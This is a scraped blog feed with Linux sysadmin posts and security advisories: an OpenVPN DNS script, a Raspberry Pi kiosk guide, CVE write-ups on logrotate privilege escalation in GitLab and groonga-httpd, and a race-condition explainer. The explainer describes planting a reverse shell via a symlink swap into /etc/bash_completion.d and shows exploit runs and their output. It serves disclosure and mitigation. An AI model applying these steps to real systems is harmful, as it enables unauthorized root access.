Linux https://tech.feedyourhead.at/ en OpenVPN: updating /etc/resolv.conf https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf <span class="field field--name-title field--type-string field--label-hidden">OpenVPN: updating /etc/resolv.conf</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>OpenVPN comes with example scripts that update <em>/etc/resolv.conf</em> through "resolvconf" or systemd-resolved. I use neither of them, so I <a href="https://github.com/whotwagner/update-resolv.conf.git">modified the script</a> to rewrite <em>/etc/resolv.conf</em> directly. I added a variable "IMMUTEABLE" to this script. If IMMUTEABLE is set to 1, the script sets the immutable file attribute (chattr +i) on /etc/resolv.conf. That prevents other programs such as DHCP clients from overwriting /etc/resolv.conf while OpenVPN is running. Note that while the attribute is set, not even root can modify or replace the file until it is cleared again with chattr -i, so the down script has to do that before restoring the original. I know it's a little bit hacky, but it works for me. 
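</p>

As an added illustration (this is not the author's script from the repository linked below), here is a minimal OpenVPN <code>--up</code>/<code>--down</code> hook in POSIX sh that does the same job: it builds a resolv.conf from the <code>dhcp-option DNS</code>/<code>DOMAIN</code> values the server pushes (OpenVPN exports them as <code>foreign_option_N</code> and sets <code>script_type</code> to <code>up</code> or <code>down</code>), backs up the old file once, writes the new one and, when <code>IMMUTABLE=1</code>, locks it with <code>chattr +i</code>. The backup location and the variable name <code>IMMUTABLE</code> are assumptions of this example.

```sh
#!/bin/sh
# Added example, not the script from the linked repository.
# OpenVPN --up/--down hook that rewrites /etc/resolv.conf directly from the
# pushed DHCP options and (optionally) makes the file immutable while the
# tunnel is up. Requires "script-security 2" in the OpenVPN config.
# Assumed interface: OpenVPN exports pushed options as foreign_option_1..N
# ("dhcp-option DNS 10.8.0.1", "dhcp-option DOMAIN vpn.example") and sets
# script_type to "up" or "down". Backup path and IMMUTABLE are this example's.

RESOLV_CONF="${RESOLV_CONF:-/etc/resolv.conf}"
BACKUP="${BACKUP:-/etc/resolv.conf.openvpn-backup}"
IMMUTABLE="${IMMUTABLE:-1}"

# Print the resolv.conf that the pushed options describe. Returns 1 when no
# DNS server was pushed, so the caller can leave the system file untouched.
render_resolv_conf() {
    domains=""
    nameservers=""
    i=1
    while :; do
        eval "opt=\${foreign_option_$i:-}"
        [ -n "$opt" ] || break
        case "$opt" in
            "dhcp-option DOMAIN "*|"dhcp-option DOMAIN-SEARCH "*)
                domains="$domains ${opt##* }" ;;
            "dhcp-option DNS "*)
                nameservers="$nameservers ${opt##* }" ;;
        esac
        i=$((i + 1))
    done
    [ -n "$nameservers" ] || return 1
    printf '# generated by the OpenVPN up script, do not edit\n'
    if [ -n "$domains" ]; then
        printf 'search%s\n' "$domains"
    fi
    for ns in $nameservers; do
        printf 'nameserver %s\n' "$ns"
    done
}

# $1 is +i or -i. Failures are ignored on filesystems without chattr support.
set_immutable() {
    if [ "$IMMUTABLE" = 1 ]; then
        chattr "$1" "$RESOLV_CONF" 2>/dev/null || :
    fi
}

up() {
    if ! content=$(render_resolv_conf); then
        echo "no DNS pushed by server, leaving $RESOLV_CONF alone" >&2
        return 0
    fi
    # Keep a copy of the original only once, so that a reconnect does not
    # overwrite the backup with the VPN version.
    [ -e "$BACKUP" ] || cp -p "$RESOLV_CONF" "$BACKUP"
    set_immutable -i
    printf '%s\n' "$content" > "$RESOLV_CONF"
    set_immutable +i
}

down() {
    # The immutable bit blocks every writer, root included, so clear it first.
    set_immutable -i
    if [ -e "$BACKUP" ]; then
        mv "$BACKUP" "$RESOLV_CONF"
    fi
}

case "${script_type:-}" in
    up)   up ;;
    down) down ;;
esac
```

Wire it in with <code>script-security 2</code>, <code>up /etc/openvpn/update-resolv.sh</code> and <code>down /etc/openvpn/update-resolv.sh</code> in the client configuration. Two caveats: a shell redirection follows symlinks, so if /etc/resolv.conf is a symlink to a stub file managed by systemd-resolved this direct-write approach is not appropriate, and the immutable bit means a crashed OpenVPN leaves the file locked until someone runs <code>chattr -i</code> by hand.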
<a href="https://github.com/whotwagner/update-resolv.conf.git">The full source can be downloaded at github.com.</a></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 26 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/bash" hreflang="en">Bash</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openssl" hreflang="en">openssl</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> </div> Thu, 26 Dec 2019 
16:45:26 +0000 Hoti 287 at https://tech.feedyourhead.at HackADay: A Christmas-Machine(Merry Christmas) https://tech.feedyourhead.at/content/hackaday-a-christmas-machine <span class="field field--name-title field--type-string field--label-hidden">HackADay: A Christmas-Machine(Merry Christmas)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I want to wish you a merry Christmas with a blog entry about a Raspberry Pi Christmas project. The "christmas-machine" shows a Merry Christmas greeting and the wishes for the "Christkind" on a TFT display attached to the Raspberry Pi. Wishes can be submitted through a web application that is reachable over the Pi's own Wi-Fi access point. I placed this installation in the coffee kitchen at the office and it was very nice to see that my colleagues had a lot of fun with it.</p> <p>Thanks to "Brother Patrick", who donated that wonderful Joy-IT TFT display to me.</p> <p> <video controls="" height="360" width="480"><source src="/sites/default/files/DateiUploads/xmasdev.mp4" type="video/mp4" /></video> </p> <h2>Install Joy-IT TFT3.2</h2> This is a very short installation guide for this display. Please see the vendor documentation for the <a href="http://anleitung.joy-it.net/wp-content/uploads/2017/04/RB-TFT3.2_RB-TFT3.5_Manual.pdf">full installation guide</a>. 
Edit /boot/config.txt: <pre><code>
dtparam=spi=on
dtoverlay=joy-IT-Display-Driver-32b-overlay:rotate=270,swapxy=1
</code></pre> Edit /boot/cmdline.txt and append "fbcon=map:10" to the (single-line) kernel command line: <pre><code>
console=serial0,115200 console=tty1 root=PARTUUID=6c586e13-02 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait fbcon=map:10
</code></pre> Install the Xorg packages: <pre><code>
apt-get install xorg xorg-docs-core xserver-xorg xserver-xorg-core xserver-xorg-input-all \
    xserver-xorg-input-libinput xserver-xorg-input-wacom xserver-xorg-legacy xserver-xorg-video-all \
    xserver-xorg-video-amdgpu xserver-xorg-video-ati xserver-xorg-video-fbdev xserver-xorg-video-fbturbo \
    xserver-xorg-video-nouveau xserver-xorg-video-radeon xserver-xorg-video-vesa
</code></pre> Edit /usr/share/X11/xorg.conf.d/99-calibration.conf: <pre><code>
Section "InputClass"
    Identifier "calibration"
    MatchProduct "ADS7846 Touchscreen"
    Option "Calibration" "160 3723 3896 181"
    Option "SwapAxes" "1"
    Option "TransformationMatrix" "1 0 0 0 -1 1 0 0 1"
EndSection
</code></pre> Edit /usr/share/X11/xorg.conf.d/99-fbturbo.conf and set fbdev to "/dev/fb1": <pre><code>
Section "Device"
    Identifier "Allwinner A10/A13 FBDEV"
    Driver "fbturbo"
    Option "fbdev" "/dev/fb1"
    Option "SwapbuffersWait" "true"
EndSection
</code></pre> Install the display overlay. The downloaded .dtb is installed under the .dtbo name that the dtoverlay line in /boot/config.txt refers to: <pre><code>
cd /tmp
wget anleitung.joy-it.net/upload/joy-IT-Display-Driver-32b-overlay.dtb
sudo cp joy-IT-Display-Driver-32b-overlay.dtb /boot/overlays/joy-IT-Display-Driver-32b-overlay.dtbo
</code></pre> <h2>Prepare the desktop environment</h2> Install the LXDE desktop: <pre><code>
apt-get install lxde-common lxde-core lxde-icon-theme lxde-settings-daemon openbox-lxde-session \
    lightdm lightdm-gtk-greeter chromium-browser unclutter
</code></pre> Set autologin for user pi in the lightdm configuration: <pre><code>
autologin-guest=false
autologin-user=pi
autologin-user-timeout=0
</code></pre> Edit /etc/xdg/lxsession/LXDE/autostart and remove the xscreensaver entry, so that the file reads: <pre><code>
@lxpanel --profile LXDE
@pcmanfm --desktop --profile LXDE
@xset s off
@xset -dpms
@xset s noblank
</code></pre> <b>Reboot</b> Edit /home/pi/.config/lxsession/LXDE/autostart: <pre><code>
@lxpanel --profile LXDE
@pcmanfm --desktop --profile LXDE
@/home/pi/startxmas.sh
@xset s off
@xset -dpms
@xset s noblank
</code></pre> Remove the screen locker and wpa_supplicant (the Pi runs its own access point instead of joining a network): <pre><code>
apt-get remove light-locker wpasupplicant
</code></pre> Create /home/pi/startxmas.sh: <pre><code>
#!/bin/bash
DISPLAY=:0.0 unclutter &
DISPLAY=:0.0 chromium-browser --kiosk --disable-restore-session-state --disable-features=TranslateUI --disable-session-crashed-bubble http://localhost/tree.html
</code></pre> <h2>Install the Access-Point</h2> <pre><code>
apt-get install hostapd dnsmasq
</code></pre> Edit /etc/hostapd/hostapd.conf: <pre><code>
interface=wlan0
driver=nl80211
ssid=xmas
hw_mode=g
channel=11
macaddr_acl=0
</code></pre> Note that this defines an open network without WPA: anyone within range can join it and submit wishes. That is intended for an office toy, but keep it in mind. Edit /etc/dhcpcd.conf and add the following lines at the end of the file: <pre><code>
interface wlan0
static ip_address=10.0.0.1/24
</code></pre> Edit /etc/dnsmasq.d/dhcp. The address line answers every DNS query with the Pi's own address, so any hostname typed into a browser lands on the wish page: <pre><code>
dhcp-authoritative
dhcp-range=10.0.0.50,10.0.0.150,12h
address=/#/10.0.0.1
interface=wlan0
</code></pre> Edit /etc/default/hostapd and set DAEMON_CONF: <pre><code>
DAEMON_CONF="/etc/hostapd/hostapd.conf"
</code></pre> Configure autostart for hostapd: <pre><code>
systemctl daemon-reload
systemctl unmask hostapd
systemctl enable hostapd
</code></pre> <h2>Configure the webservice</h2> <pre><code>
apt-get install apache2 php7.3 php7.3-cli php7.3-json git
</code></pre> Download the web files. The wishes directory is handed to the web server user so that the web application can store the submitted wishes there: <pre><code>
git clone https://github.com/whotwagner/xmas2019.git /tmp/xmas2019
cp -r /tmp/xmas2019/* /var/www/html/
chown www-data /var/www/html/wishes
</code></pre> <b>Reboot</b> <h2>MERRY CHRISTMAS AND A HAPPY NEW YEAR 2020</h2> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created 
field--type-created field--label-hidden">Dec 21 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/xmas" hreflang="en">xmas</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/hackaday" hreflang="en">HackADay</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/raspberry" hreflang="en">Raspberry</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Fun" hreflang="en">Fun</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> </div> </div> Sat, 21 Dec 2019 20:28:14 +0000 Hoti 286 at https://tech.feedyourhead.at CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab 
Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system user "git". Since logrotate runs as root and creates the rotated files inside a directory that this unprivileged user controls, a local user with a shell as "git" can abuse the logrotate race condition (described in the logrotate post on this site) to obtain root access.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who has already obtained a shell as user "git" can escalate to "root". Because a separate exploit is needed to get that shell, the severity is rated low rather than high.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a> </li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a> </li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div 
class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga / groonga-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> 
<li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The log directory of groonga-httpd is under the control of the user groonga, so that user can manipulate its path:</p> <pre><code>
ls -l /var/log/groonga
total 8
-rw-r--r-- 1 root    root    1296 Apr 25 18:44 groonga.log
drwxr-xr-x 2 groonga groonga 4096 Apr 25 18:55 httpd
</code></pre> <p>The files in /var/log/groonga/httpd/*.log are rotated once a day by logrotate, running as root, with the following configuration:</p> <pre><code>
/var/log/groonga/httpd/*.log {
    daily
    missingok
    rotate 30
    compress
    delaycompress
    notifempty
    create 640 groonga groonga
    sharedscripts
    postrotate
        . /etc/default/groonga-httpd
        if [ x"$ENABLE" = x"yes" ]; then
            /usr/bin/curl --silent --output /dev/null \
                "http://127.0.0.1:10041/d/log_reopen"
        fi
    endscript
}
</code></pre> <p>Because <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race condition</a>, user "groonga" can replace the directory /var/log/groonga/httpd with a symbolic link to an arbitrary directory (for example /etc/bash_completion.d) at the moment of rotation. logrotate then creates the new log file AS ROOT inside /etc/bash_completion.d and, as the create directive instructs, sets its owner and group to groonga:groonga. 
An attacker can simply write a reverse shell into this file. Files in /etc/bash_completion.d are sourced by bash-completion when an interactive shell starts, so as soon as root logs in the payload runs with root privileges.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of the log directory (/var/log/groonga and its httpd subdirectory) to root, or by adding the "su" directive to the logrotate configuration so that the rotation itself runs as the unprivileged user instead of root.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at Anatomy of a Linux container rootkit https://tech.feedyourhead.at/content/anatomy-of-a-linux-container-rootkit <span class="field field--name-title field--type-string field--label-hidden">Anatomy of a Linux container rootkit</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>This year I gave a talk at the <a href="https://eh19.easterhegg.eu">Easterhegg 2019</a> about a Linux kernel rootkit that can handle containers. I mainly presented my Bachelor's thesis from 2017 with some improvements.</p> <h2>Abstract</h2> <p>Linux containers are becoming increasingly popular, so it is likely that attacks against container systems will increase. After successfully defeating all the security mechanisms of a container system, an attacker could plant a "rootkit". This talk provides details of the anatomy of such a rootkit. First the main functions of rootkits are explained. After a brief introduction to Linux containers and Linux kernel rootkits, a kernel rootkit called "themaster", developed by the author of this thesis, is described and explained. Well-known rootkit methods are used to implement functions that hide resources and escalate privileges. Results indicate that in container systems, patching system calls is the preferred method for functions that are globally accessible, whereas for providing rootkit functionality in specific containers, patching the virtual file system is the better approach. 
A special backdoor for breaking out of the container is also included, and "themaster" operates stealthily.</p> <h2>Talk</h2> <p><iframe allowfullscreen="" frameborder="0" height="576" src="https://media.ccc.de/v/eh19-168-anatomie-eines-containerfhigen-linux-kernel-rootkits/oembed" width="800"></iframe></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/kernel" hreflang="en">Kernel</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/docker" hreflang="en">Docker</a></div> </div> </div> Tue, 07 May 2019 20:03:34 +0000 Hoti 277 at 
https://tech.feedyourhead.at Details of a logrotate race-condition https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition <span class="field field--name-title field--type-string field--label-hidden">Details of a logrotate race-condition</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Logrotate is prone to a race condition on systems where a log directory is under the control of a low-privileged user. A malicious user can trick logrotate, when it is executed as root, into creating files in an arbitrary directory. This can lead to privilege escalation.</p> <h2>Description</h2> <p>The Linux man page describes logrotate as follows:</p> <blockquote> <p><strong>logrotate</strong> is designed to ease administration of systems that generate large numbers of log files. It allows automatic rotation, compression, removal, and mailing of log files. Each log file may be handled daily, weekly, monthly, or when it grows too large.</p> </blockquote> <p>On most Linux distributions, logrotate is executed automatically once a day as user root.</p> <p>Logrotate supports different methods for creating new files. For example, the directive "copy" makes a copy of the log file and "create" creates a new empty log file after rotating. If someone exchanges the log directory for a symbolic link just before the new log file is created, logrotate puts the new file into a different directory.</p> <p>As shown in the diagram below, such a scenario can be exploited if logrotate runs as root and a low-privileged user controls some part of the path to the log directory. If this user exchanges the log directory for a symbolic link at the right time, logrotate writes the new file into the linked directory. 
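</p>

The following is an added example, not code from this post or from the logrotten repository: a POSIX sh audit that walks every directory component of each path a logrotate configuration rotates and reports the components a non-root user could rename or replace with a symlink (not owned by root, world- or group-writable, already a symlink, or carrying an ACL as in the www-data example further down). Stanzas that use the <code>su</code> directive are skipped, because those are rotated as the named user instead of root, which is also the mitigation given in the groonga-httpd advisory above. It assumes a GNU or BSD <code>find</code> that understands <code>-maxdepth</code>; the function names are this example's own.

```sh
#!/bin/sh
# Added example, not code from the post or from the logrotten repository.
# Audits logrotate config stanzas for the race described above: for every
# rotated path, each directory component is checked for being controllable
# by a user other than root. Assumes GNU or BSD find (-maxdepth) and that
# logrotate itself runs as root, as it does from the daily cron job.

# Print a reason and return 0 if the single path component $1 can be renamed
# or replaced by a non-root user; return 1 if it looks safe.
component_is_weak() {
    p=$1
    if [ ! -e "$p" ]; then echo "$p: does not exist"; return 0; fi
    if [ -L "$p" ]; then echo "$p: is a symlink"; return 0; fi
    if [ -n "$(find "$p" -maxdepth 0 -perm -0002 -print 2>/dev/null)" ]; then
        echo "$p: world-writable"; return 0
    fi
    if [ -n "$(find "$p" -maxdepth 0 -perm -0020 ! -group root -print 2>/dev/null)" ]; then
        echo "$p: writable by a non-root group"; return 0
    fi
    if [ -n "$(find "$p" -maxdepth 0 ! -user root -print 2>/dev/null)" ]; then
        echo "$p: not owned by root"; return 0
    fi
    # ls marks entries that carry an ACL with a trailing "+" in the mode column
    # (example 2 below: root-owned paths that www-data may still write).
    case "$(ls -ld "$p" | cut -c1-11)" in
        *+) echo "$p: has an ACL, inspect with getfacl"; return 0 ;;
    esac
    return 1
}

# Check every directory component of the log path $1 (a file or a glob),
# from the top of the tree down to the directory that holds the log file.
# Prints one line per weak component; returns 0 if any was found.
audit_path() {
    dir=$(dirname "$1")
    rest=${dir#/}
    acc=""
    weak=1
    while [ -n "$rest" ]; do
        part=${rest%%/*}
        case "$rest" in */*) rest=${rest#*/} ;; *) rest="" ;; esac
        acc="$acc/$part"
        if component_is_weak "$acc"; then weak=0; fi
    done
    return $weak
}

# Reduce a logrotate config file to one "patterns|su-args" line per stanza.
stanzas() {
    awk '
        /^[[:space:]]*#/ { next }
        /[{]/ { in_stanza = 1; sub(/[{].*/, ""); paths = paths " " $0; next }
        /[}]/ { gsub(/^ +| +$/, "", paths); print paths "|" su; paths = ""; su = ""; in_stanza = 0; next }
        in_stanza && $1 == "su" { su = $2 " " $3; next }
        !in_stanza { paths = paths " " $0 }
    ' "$1"
}

# Audit all stanzas of the logrotate config file $1.
audit_logrotate_config() {
    set -f   # the patterns are globs; keep them literal while iterating
    stanzas "$1" | while IFS='|' read -r paths su; do
        for pattern in $paths; do
            if [ -n "$su" ]; then
                echo "$pattern: rotated with 'su $su' instead of as root, skipped"
                continue
            fi
            audit_path "$pattern" | sed "s|^|$pattern: |"
        done
    done
    set +f
}

if [ $# -eq 1 ]; then
    audit_logrotate_config "$1"
fi
```

Run it as <code>sh audit.sh /etc/logrotate.d/groonga-httpd</code>; every printed line names a path component that could be swapped underneath root while it rotates. The check is deliberately conservative: /tmp is reported as world-writable although its sticky bit prevents renaming entries owned by others, and a finding on a component means the whole tree below it has to be treated as attacker-controlled, which is exactly the point of example 3 below.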
After that the permissions of the created file are adjusted, and the attacker may end up with write access to that file.</p> <p><img alt="logrotate race-condition sequence diagram" data-entity-type="file" data-entity-uuid="7107350b-2651-4742-bc62-18893ffd5e17" src="/sites/default/files/inline-images/sequence.png" /></p> <h2>Exploit</h2> <p>The race condition can be exploited by setting an inotify hook on the log file. As soon as logrotate touches the log file, the exploit is notified and exchanges the log directory for a symbolic link to /etc/bash_completion.d. Logrotate then creates the new log file in /etc/bash_completion.d as root and adjusts the owner and permissions of that file afterwards. The new log file is writable by the attacker if logrotate is configured to set the owner of the file to the uid of the malicious user. The attacker can therefore write a reverse-shell payload into this file. As soon as root logs in, the reverse shell is executed and spawns a root shell for the attacker.</p> <p>An implementation of such an exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <p>Using inotify has its limitations. It is too slow on filesystems that sit on top of lvm2 volumes or overlayfs.</p> <h2>Examples</h2> <p>The following examples show different setups in which logrotate can be exploited:</p> <h3>1) Logfile owner is a user. Compress option is set</h3> <p>In this example the path is under the control of user alice and the "compress" directive is set in logrotate. The exploit hooks the IN_OPEN operation on the file file.log.1. After the daily run of logrotate, a file owned by alice can be found at <i>/etc/bash_completion.d/file.log.1.gz</i>.</p> <p>The log directory is inside the home directory of user alice:</p> <pre><code>
drwxr-xr-x 2 alice alice 4096 Apr 30 09:40 /home/alice/logdir
</code></pre> <p>Alice has permission to write to the log file:</p> <pre><code>
-rw-r--r-- 1 alice alice 200000 Apr 30 09:40 /home/alice/logdir/file.log
</code></pre> <p>The directive "compress" is used inside the logrotate configuration:</p> <pre><code>
/home/alice/logdir/file.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    compress
}
</code></pre> <p>Alice runs the exploit with the hook set on file.log.1 and with the parameter for compression. The exploit fires when cron runs logrotate as root:</p> <pre><code>
alice@localhost$ ./logrotten -c /home/alice/logdir/file.log.1
Waiting for rotating /home/alice/logdir/file.log.1...
Renamed /home/alice/logdir with /home/alice/logdir2 and created symlink to /etc/bash_completion.d
Done!
</code></pre> <p>The compressed log file is created in /etc/bash_completion.d with owner alice:</p> <pre><code>
-rw-r--r-- 1 alice alice 200053 Apr 30 09:40 /etc/bash_completion.d/file.log.1.gz
</code></pre> <h3>2) Logfile owner is root:root, but ACLs permit a user to write the logfile.</h3> <p>This example illustrates a case where the insecure configuration is not obvious. Root owns the complete path and the log file, but ACLs allow user www-data to modify the directory /var/www/project and the log file /var/www/project/logdir/file.log. As soon as logrotate triggers the exploit, a new file /etc/bash_completion.d/file.log is created and the ACLs are copied onto it.</p> <p>Permissions of the log directory. It is owned by root, but ACLs are in use (note the trailing "+"):</p> <pre><code>
drwxrwxr-x+ 2 root root 4096 Apr 30 17:09 /var/www/project/logdir
</code></pre> <p>The log file is also owned by root, with ACLs set:</p> <pre><code>
-rw-rw-r--+ 1 root root 12 Apr 30 17:09 /var/www/project/logdir/file.log
</code></pre> <p>Access control list of /var/www/project:</p> <pre><code>
# file: var/www/project
# owner: root
# group: root
user::rwx
user:www-data:rwx
group::r-x
mask::rwx
other::r-x
</code></pre> <p>Access control list of /var/www/project/logdir:</p> <pre><code>
# file: var/www/project/logdir
# owner: root
# group: root
user::rwx
user:www-data:rwx
group::r-x
mask::rwx
other::r-x
default:user::rwx
default:user:root:rwx
default:user:www-data:rwx
default:group::r-x
default:mask::rwx
default:other::r-x
</code></pre> <p>Logrotate configuration with "create root root":</p> <pre><code>
/var/www/project/logdir/file.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create root root
}
</code></pre> <p>www-data executes the exploit and waits until logrotate is started by cron:</p> <pre><code>
www-data@localhost$ ./logrotten /var/www/project/logdir/file.log
Waiting for rotating /var/www/project/logdir/file.log...
Renamed /var/www/project/logdir with /var/www/project/logdir2 and created symlink to /etc/bash_completion.d
Done!
</code></pre> <p>The new file is created in /etc/bash_completion.d with owner root and with the ACLs set, so www-data can still write to it:</p> <pre><code>
-rw-rw-r--+ 1 root root 0 Apr 30 17:16 /etc/bash_completion.d/file.log
</code></pre> <p>Access control list of /etc/bash_completion.d/file.log:</p> <pre><code>
# file: etc/bash_completion.d/file.log
# owner: root
# group: root
user::rw-
user:root:rwx            #effective:rw-
user:www-data:rwx        #effective:rw-
group::r-x               #effective:r--
mask::rw-
other::r--
</code></pre> <h3>3) Parent directory is secure and owned by root, but another directory above the parent is writable by a user. The logfile is owned by root.</h3> <p>This example shows that it is not enough to ensure that the log directory and its parent are owned by root. 
